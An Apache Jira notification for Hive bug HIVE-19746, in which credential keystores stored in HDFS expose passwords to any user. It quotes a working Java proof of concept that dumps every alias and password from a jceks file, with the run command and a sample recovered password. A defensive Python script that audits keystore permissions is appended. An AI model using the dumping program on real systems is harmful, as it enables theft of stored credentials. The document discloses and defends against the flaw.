[ https://issues.apache.org/jira/browse/HIVE-19746?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16939030#comment-16939030 ]
Thejas Nair commented on HIVE-19746:
------------------------------------

The jceks file can be stored in local filesystem, to avoid this issue.

> Hadoop credential provider allows to read passwords for every user
> ------------------------------------------------------------------
>
>                 Key: HIVE-19746
>                 URL: https://issues.apache.org/jira/browse/HIVE-19746
>             Project: Hive
>          Issue Type: Bug
>          Components: Security
>            Reporter: Oleksiy Sayankin
>            Assignee: Oleksiy Sayankin
>            Priority: Blocker
>
> This simple program allows reading any password from any {{jceks}} file:
> {code}
> package com.test.app;
>
> import java.io.IOException;
> import java.util.List;
>
> import org.apache.hadoop.conf.Configuration;
> import org.apache.hadoop.security.alias.CredentialProvider;
> import org.apache.hadoop.security.alias.CredentialProviderFactory;
>
> public class PasswordReader {
>
>     public static void main(String[] args) throws IOException {
>         if (args == null || args.length == 0) {
>             throw new IllegalArgumentException("Credential provider path is not set");
>         }
>         String credentialProviderPath = args[0];
>
>         // Point hadoop.security.credential.provider.path at the keystore given on the command line
>         Configuration configuration = new Configuration();
>         configuration.set(CredentialProviderFactory.CREDENTIAL_PROVIDER_PATH, credentialProviderPath);
>
>         // Take the first provider and dump every alias it stores, in clear text
>         CredentialProvider credentialProvider = CredentialProviderFactory.getProviders(configuration).get(0);
>         List<String> aliases = credentialProvider.getAliases();
>         for (String alias : aliases) {
>             System.out.println(alias + " = " + new String(configuration.getPassword(alias)));
>         }
>     }
> }
> {code}
> {code}
> java -cp $(hadoop classpath):password-reader.jar com.test.app.PasswordReader jceks://hdfs/user/hive/hivemetastore.jceks
> {code}
> *RESULT*
> {code}
> javax.jdo.option.connectionpassword = 123456
> {code}
> File {{jceks://hdfs/user/hive/hivemetastore.jceks}} has {{-rw-r--r--}} permissions and {{hdfs:hdfs}} owner:group.
> We can't remove world-readable permissions here, because Hive is configured for impersonation to allow users other than {{hdfs}} to connect to HiveServer2. When I removed world-readable permissions and tried to connect as another user, I got the exception:
> {code}
> 2018-05-31T10:08:40,191 ERROR [pool-7-thread-41] fs.Inode: Marking failure for: /user/hive/hivemetastore.jceks, error: Input/output error
> 2018-05-31T10:08:40,192 ERROR [pool-7-thread-41] fs.Inode: Throwing exception for: /user/hive/hivemetastore.jceks, error: Input/output error
> 2018-05-31T10:08:40,192 ERROR [pool-7-thread-41] metastore.RetryingHMSHandler: java.lang.RuntimeException: Error getting metastore password: null
>         at org.apache.hadoop.hive.metastore.ObjectStore.getDataSourceProps(ObjectStore.java:485)
>         at org.apache.hadoop.hive.metastore.ObjectStore.setConf(ObjectStore.java:279)
> {code}
> Any ideas how to protect passwords (let's say restrict access to {{jceks://hdfs/user/hive/hivemetastore.jceks}} to {{600}}) and at the same time still be able to connect to HS2 as a non-admin user?

-- This message was sent by Atlassian Jira (v8.3.4#803005)
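The check that follows from the thread above, as an added example that is not part of the ticket and not Hive or Hadoop code: walk a `hadoop.security.credential.provider.path` value, flag any `jceks://hdfs/...` entry (one shared file that every HDFS reader of it can dump with a program like the one posted), and for `jceks://file/...` or `localjceks://file/...` entries verify that the keystore on this host is owner-read-only. The two keystore files and their contents are constructed placeholders written to a temporary directory; the expected-owner uid is assumed to be the uid of the service account that runs the check.

```python
import os
import stat
import tempfile
from urllib.parse import urlparse

# Hadoop property listing the credential providers, comma separated (the same
# property the posted PasswordReader sets through
# CredentialProviderFactory.CREDENTIAL_PROVIDER_PATH).
PROVIDER_PATH_KEY = "hadoop.security.credential.provider.path"

# Permission bits that let anyone other than the owner read the keystore.
NON_OWNER_READ = stat.S_IRGRP | stat.S_IROTH


def split_provider_path(value):
    """Split the comma separated provider list into individual URIs."""
    return [p.strip() for p in value.split(",") if p.strip()]


def classify_provider(uri):
    """Return ('local', path), ('hdfs', path) or ('other', uri).

    jceks://file/... and localjceks://file/... are opened from the local disk
    of the process that reads them; jceks://hdfs/... is one shared file in
    HDFS, the layout the ticket shows being dumped by an ordinary user.
    """
    parsed = urlparse(uri)
    if parsed.scheme in ("jceks", "localjceks") and parsed.netloc == "file":
        return ("local", parsed.path)
    if parsed.scheme == "jceks" and parsed.netloc == "hdfs":
        return ("hdfs", parsed.path)
    return ("other", uri)


def audit_local_keystore(path, expected_owner_uid=None):
    """Return a list of findings for a local keystore; empty means it is owner-only."""
    st = os.stat(path)
    mode = stat.S_IMODE(st.st_mode)
    findings = []
    if mode & NON_OWNER_READ:
        findings.append("readable by group or others (mode %04o)" % mode)
    if expected_owner_uid is not None and st.st_uid != expected_owner_uid:
        findings.append("owned by uid %d, expected %d" % (st.st_uid, expected_owner_uid))
    return findings


def audit_provider_path(value, expected_owner_uid=None):
    """Audit every provider URI in a provider-path value.

    Returns a dict mapping each URI to its list of findings (empty list = ok).
    """
    report = {}
    for uri in split_provider_path(value):
        kind, path = classify_provider(uri)
        if kind == "hdfs":
            # HDFS cannot be stat'ed offline; the finding is structural: every
            # user allowed to read the file can recover every alias in it.
            report[uri] = ["stored in HDFS: any user who can read the file can dump every alias"]
        elif kind == "local":
            if not os.path.exists(path):
                report[uri] = ["missing on this host"]
            else:
                report[uri] = audit_local_keystore(path, expected_owner_uid)
        else:
            report[uri] = ["unrecognised provider scheme; inspect manually"]
    return report


def demo():
    """Audit one HDFS provider and two constructed local keystores (0644 and 0600)."""
    tmp = tempfile.mkdtemp()
    world_readable = os.path.join(tmp, "shared.jceks")
    owner_only = os.path.join(tmp, "private.jceks")
    for path, mode in ((world_readable, 0o644), (owner_only, 0o600)):
        with open(path, "wb") as f:
            f.write(b"constructed placeholder, not a real keystore")
        os.chmod(path, mode)
    value = ",".join([
        "jceks://hdfs/user/hive/hivemetastore.jceks",   # the layout from the ticket
        "localjceks://file" + world_readable,           # local but still 0644
        "localjceks://file" + owner_only,               # local and 0600
    ])
    # Assumption: the auditing process runs as the service account that owns the keystores.
    return audit_provider_path(value, expected_owner_uid=os.getuid())


if __name__ == "__main__":
    for uri, findings in demo().items():
        print(uri, "->", findings or "ok")
```

Run it as the account that owns the keystore (for the ticket's setup, the account HiveServer2 and the metastore run as). A local keystore at 0600 is only protected against other OS accounts on that host, so the audit is a check on the file, not on who can reach the service; it also cannot tell whether the running service actually reads the path it inspects, so compare the provider-path value against the live hive-site.xml rather than a copy.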